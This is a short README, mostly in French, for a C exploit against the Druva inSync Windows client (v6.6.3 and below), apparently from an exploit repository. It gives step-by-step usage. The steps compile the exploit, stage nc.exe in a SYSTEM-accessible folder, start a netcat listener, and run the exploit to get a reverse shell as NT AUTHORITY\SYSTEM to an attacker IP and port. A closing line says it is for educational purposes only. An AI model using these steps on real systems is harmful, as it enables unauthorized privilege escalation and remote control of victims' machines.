
Élévation de privilèges locaux pour Druva
Un exploit en C pour le client Windows Druva inSync (v6.6.3 et inférieur). L'application expose un service RPC sur le port 6064 qui est vulnérable à une injection de commande via un parcours de chemin. Cela permet à un utilisateur local d'exécuter des commandes arbitraires en tant que NT AUTHORITY\SYSTEM.
Utilisez gcc (MinGW) pour compiler le code source :
gcc exploit.c -o exploit.exe -lws2_32
Placez une copie de nc.exe dans un répertoire accessible par le compte SYSTEM (par exemple, C:\Windows\Tasks).
Démarrez un écouteur sur votre machine d'attaque :
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
Cet outil est uniquement à des fins éducatives. L'utilisation non autorisée sur des systèmes que vous n'avez pas l'autorisation de tester est illégale